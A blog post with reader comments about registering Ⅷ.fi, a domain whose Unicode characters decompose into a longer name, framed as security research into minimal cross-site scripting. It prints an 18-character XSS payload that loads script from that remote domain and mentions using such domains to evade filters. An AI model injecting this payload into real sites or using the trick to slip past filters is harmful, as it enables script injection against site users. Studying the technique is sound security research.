Buying a single character domain – and 3 character FQDN – for £15

by @edent | # # # # | 15 comments | Read ~19,381 times.

Short domains are useful for security testing. If you only have a limited number of characters, you need to be able to reference code on a remote server in as few characters as possible.

A few years ago, I tried to find a Minimum Viable XSS. The conclusion that I (and others) came to is that 20 characters is the bare minimum. But it requires you have a 2 character domain name on a 2-character TLD. Something like xy.uk

I don’t think any 1- or 2-character domain names are available. If they’re for sale, it will be at extortionate price. There are no Top-Level Domains shorter than 2 characters.

So, let’s cheat!

This is the story of how I bought a single character domain, and am able to reference it in 3 characters, for the cost of a round of drinks.

Brief History

As I discussed in Domain hacks with unusual Unicode characters – there are a bunch of single Unicode codepoints which are normalised to 2- or 3-character sequences.

For example, is the scientific symbol for Hertz. It is a single codepoint (U+3390). When your browser sees it in a domain name, it automatically splits it into the H and z characters. This is called decomposition.

Based on my count, there are about 90 symbols which decompose into 2 characters – for example , , dz.
There are about 35 symbols which decompose into 3 characters – for example , , .

But, as mentioned, it is almost impossible to find a cheap 2- or 3-letter domain name.

There are, however, a couple of four character decompositions!

Quidquid latine dictum sit, altum videtur

The Romans didn’t use a positional number system. The number 1 was Ⅰ, the number 2 was Ⅱ, the number 9 was Ⅸ.

But – look closely! The is not the English letter I – it is its own, separate, Unicode character (U+2160). And is not two s smushed together, it is (U+2161).

When decomposed, however, they return to English letters.

What’s the longest Roman numeral captured in a single codepoint?

The number 8 is (U+2167) – which decomposes to V I I I. Four characters!

but apart from the sanitation, the medicine, education, wine, public order, irrigation, roads, a fresh water system, public health, and a number system suitable for character decomposition what have the Romans ever done for us?

tl;dr TLD

There are a number of Top-Level Domains which can also be represented by a single character.

For example, Australia’s TLD .au can be represented by the Astronomical Unit sign (U+3373).

Most of those domains were expensive, or unavailable. But I found one which was both cheap and available.

Yes! The orthographic ligature of decomposes to f and i. That’s the TLD for Finland.

I was able to register a Finnish domain on Gandi for £15.

Ⅷ.fi

That’s Roman Numeral Eight (U+2167), dot (U+002E), Latin Small Ligature Fi (U+FB01).

Is this useful?

This gives me a Minimum Viable XSS in eighteen characters!

  • <script src=//Ⅷ.fi>

I’m pretty sure that’s the shortest possible sequence!

Or, for loading remote resources in 15 characters:

  • <img src=//Ⅷ.fi>

There aren’t many sites which are secured only by using a restricted character count – thankfully! But shrunk domains can also be useful for evading all sorts of filters.

Other domains are available

There’s one other 4-character decomposition available – see if you can find it!
There are a few shrinkable TLDs which still have some of the 2- and 3-character domains available, but they are extortionately priced.

If you do grab one of these, and make something cool with it, please let me know.

Support this blog

If you’ve learned something from my blog posts, here’s how you can return the favour:

15 thoughts on “Buying a single character domain – and 3 character FQDN – for £15

  1. Matt says:

    Is it kcal? U+3389 nice article!

  2. Yay. I knew it would be something like this. That’s cute.


  3. Looks like .fi domains are versatile.

  4. gorzilla says:

    I’m surprised to learn there are chars that expand into slashes. That seems like it could be really useful but I’m not sure what for 🤔



  5. Buying a single character domain – and 3 character FQDN – for £15
    Link: shkspr.mobi/blog/2020/08/b…
    Comments: news.ycombinator.com/item?id=241681…

  6. gorzilla says:

    Outside of DNS I wonder if a powershell script with a .㎰1 ending would do anything interesting



  7. Not working on iOS Safari without protocol …? Ⅷ.fi ❌ https://Ⅷ.fi/


  8. Is the Unicode > plain text expansion handled at a WebKit or OS level? 🤔


  9. @mikko says:

    Very cool and nice post!

    Couple of years ago you could do the same trick (on most browsers) in just TWO characters. This trick was using Unicode letters like ’⒉ ’ or ’⒖ ’ or ’🄀 ’, and for the TLD letters like ’fi’ or ’℡’ or ’™’.


  10. GC says:

    Does if really work? Won’t the domain and tld be translated into punycode IDN? You’d get “xn--x4g.xn--jm6c”… On top of xn--jm6c not being a valid TLD, it isn’t that short anymore…

    1. @edent says:

      It does work. Copy and past these characters into your browser to test Ⅷ.fi

      There is no Punycode. Your browser performs the IDNA2008 process listed in RFC5895 to normalise it first.

  11. I just bought XIV.fi thanks for the heads up


  12. renniepak says:

    I was looking into the exact same thing lately and ended up settling for a 3 char domain: ㎠.℡ (which is still pretty awesome!)

    Funny to read you had the same journey!



  13. Roninkoi says:

    As of today, I’m the proud owner of the 3 char domain https://㎦.fi

    It consists of the Unicode characters for cubic kilometer and fi ligature, which decompose in most browsers as explained here:
    shkspr.mobi/blog/2020/08/b…

Leave a Reply

Your email address will not be published. Required fields are marked *